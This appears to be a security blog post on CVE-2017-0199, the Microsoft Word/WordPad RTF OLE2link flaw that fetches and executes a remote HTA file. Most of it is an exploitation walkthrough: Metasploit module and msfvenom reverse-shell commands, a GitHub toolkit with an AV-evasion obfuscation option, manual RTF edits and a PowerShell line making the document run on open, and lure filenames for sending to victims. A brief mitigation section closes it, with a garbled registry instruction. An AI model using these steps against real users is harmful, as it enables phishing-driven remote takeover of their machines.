Analysis of CVE-2017-0199, MS Word Threats are back

In Early April, an advisory was released forCVE-2017-0199, the vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files.Patches that were released included mitigation for Office 2007/2010/2013/2016 and Wordpad for Windows versions Vista/7/8/2008/2012. It’s related to the Windows Object Linking and Embedding (OLE), it can be exploited through a Microsoft Word RTF (Rich Text Format) file, which contains an embedded OLE2link object. The code sends an HTTP request to a remote host and retrieves a .HTA (HTML Application)file. HTA files have been around since 1999 and have the ability to run scripting languages such as VBScript or JScript. For all intents and purposes they are essentially treated as an executable file when opened. Microsoft Word and Wordpad uses the file handler for application/hta through a COM object, which causes mshta.exe (Microsoft HTA application) execute the malicious script.

This discovered 0day was discovered in the wild as far back as September 2016 by a security firm and soon after the patch was available, there were people posting code on GitHub and to Metasploit to craft one of these weaponized .RTF files. And we’re going to show you a few different ways to exploit this to better understand how the vulnerability works and some information on how to automatically exploit without any user interaction, other than opening the weaponized document.

Our first go to is Metasploit, which makes it easier to exploit your target and use built-in payloads to control them after successfully exploiting them. Fire up Metasploit using msfconsole, then we are going to use the office_word_hta exploit which automatically starts a webserver up, and gives us a reverse TCP listener on port 4444

use exploit/windows/fileformat/office_word_hta

set srvhost 192.168.1.101

set filename Company_Downsizing.doc

set lhost 192.168.1.101

exploit -j

This module will automatically generate a malicious .rtf file inside /root/.msf4/local/sales.doc. You then can send the file to your victim. Once the victim opens the document, even though they get a prompt to open data from linked files, your code has already executed silently in the background.

You should see a callback to meterpreter and your shell awaiting without user interaction besides them opening the file.

Our second option to use this exploit is use some python code posted on GitHub fromBhdresh (Bhadresh Patel). The code is an improvement in that gives an option to obfuscate the RTF file to bypass AV signatures, and you could choose to use different payloads besides meterpreter, like Empire or Cobalt Strike beacons. To generate the files needed is pretty straight forward and he offers a tutorial and video on his GitHub page. Essentially it breaks down as follows using a Linux distro like Kali:

1) Download the files from Bhdresh’s GitHub repo

# git clone https://github.com/bhdresh/CVE-2017-0199.git && cd CVE-2017-0199

2) Generate malicious RTF file (-x flag 0 for normal, 1 for obfuscated)

# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.1.101/logo.doc -x 1

3) (Optional Payload) In a new console tab generate metasploit payload and start a handler

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe > /tmp/RevTCP4444.exe

# msfconsole -x “use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.101; run”

4) In first tab start toolkit in exploit mode to deliver local payload

Screen Shot 2017-05-18 at 2.49.41 PM.png

Once your target opens the document you should see it call back to get the HTA then your meterpreter (or whatever payload you chose) open.

Screen Shot 2017-05-18 at 2.51.30 PM.png

For the third option we choose to follow a guide from here that we can use to create or own weaponized .rtf file by hand. Although the process would still be using or payloads, it’s less likely to get caught from AV vs. a file generated from Metasploit. First you just need to create an HTA file like::this::and placing your base64 encoded payload in the script. Or you again can use Metasploit and start a hta_server to automatically generate an evil meterpreter HTA script, start a webserver, and open a listener.

use exploit/windows/misc/hta_server

set URIPATH /evil

set srvhost 192.168.2.73

run –j

Now you’ll need to embed an OLE2 link object in to a document, open Microsoft Word and click on the ‘Insert’ tab on the top ribbon and then click on the ‘Object’ button.

Select‘Create from File’ tab, type the URL to the HTA file that you’ll be hosting (if you chose to use Metasploit the URL would be something like http://192.168.2.73:8080/evil), make sure to checkoff both ‘Link to file’ and ‘Display as icon’.

Hit ‘OK’ then save a DOCX, DOC or RTF file. Now this file by itself would need the victim to click the icon inside the document to execute the HTA. as

To get this RTF file to run your HTA without any user interaction we’re going to have to manually edit the created document by modifying it in notepad and then saving the file.

Original:

{\object\objautlink\rsltpict\objw9027\objh450{\*\objclass Word.Document.8}{\*\objdata

Change to add \objupdate after \objautlink:

{\object\objautlink\objupdate\rsltpict\objw9027\objh450{\*\objclass Word.Document.8}{\*\objdata

Or if you want to use PowerShell you can run this command:

(Get-Content C:\Path\To\Company_Downsizing.doc) | Foreach-Object {$_ -replace “rsltpict”, “objupdate\rsltpict”} | Set-Content C:\Path\To\Company_Downsizing.doc

Once this is complete your newly created file should be weaponized to automatically execute on the victim.

Mitigation:

Microsoft has published a patch 4 days after the disclosure of the vulnerability. End users who have successfully installed the update do not need to take any further action. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199

Do not open any Office files obtained from untrusted locations. According to tests, this attack cannot bypass the Office Protected View, so as a precautionary measure, ensure that Office Protected View is enabled by adding the following to the Windows registry:

Software\Microsoft\Office\15.0\Word\Security\FileBlock\RtfFiles to 2 and OpenInProtectedView to then rebooting the PC to set the new changes.